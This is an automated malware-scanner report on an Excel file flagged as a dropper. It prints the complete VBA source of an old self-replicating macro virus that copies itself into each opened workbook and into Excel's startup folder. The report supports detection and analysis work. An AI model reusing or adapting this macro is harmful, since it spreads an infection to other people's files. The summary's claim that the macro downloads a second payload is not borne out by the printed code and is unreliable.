MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel document contains a VBA macro that is triggered by the 'auto_open' subroutine. The macro attempts to save a copy of itself as 'ICEBOOK.XLS' in the startup path, and then appears to prepare for further execution. The ClamAV detection name 'Xls.Dropper.Agent-1633146' strongly suggests this is a dropper malware designed to download and execute a secondary payload.
Heuristics 3
-
ClamAV: Xls.Dropper.Agent-1633146 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-1633146
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1837 bytes |
SHA-256: 816984d0f10020575f5559f5cdef52179027d4e8a6550d76bc0024307aa7f767 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ice"
' Ice-LC's work! Do you like it?
' 25 Jan 1999. С днём студента!
' Bonne voyage!
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnWindow = "ice_action"
End Sub
Sub ice_action()
Attribute ice_action.VB_Description = "0"
Attribute ice_action.VB_ProcData.VB_Invoke_Func = " \n14"
Dim c As String, ab As String, newname As String
Dim ib As Integer, wb As Integer, i As Integer
On Error Resume Next
c$ = Application.StartupPath
If Dir(c$ & "\" & "ICEBOOK.XLS") = "ICEBOOK.XLS" Then ib = 1 Else ib = 0
wb = 0
For i = ActiveWorkbook.Modules.Count To 1 Step -1
If ActiveWorkbook.Modules(i).name = "Ice" Then
wb = 2
Exit For
End If
Next i
ab$ = ActiveWorkbook.name
Select Case ib + wb
Case 1
Application.ScreenUpdating = False
Workbooks("ICEBOOK.XLS").Sheets("Ice").Copy before:= _
Workbooks(ab$).Sheets(1)
Workbooks(ab$).Sheets("Ice").Visible = False
Application.ScreenUpdating = True
Case 2
Application.ScreenUpdating = False
Sheets("Ice").Visible = True
Sheets("Ice").Copy
With ActiveWorkbook
.title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.name
ActiveWindow.Visible = False
Err = 0
Workbooks(newname$).SaveAs Filename:=c$ & "\" & _
"ICEBOOK.XLS", FileFormat:=xlNormal, Password:="", _
WriteResPassword:="", ReadOnlyRecommended:=False, _
CreateBackup:=False
If Err = 0 Then Application.OnWindow = "icebook.xls!ice_action"
Sheets("Ice").Visible = False
Application.ScreenUpdating = True
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.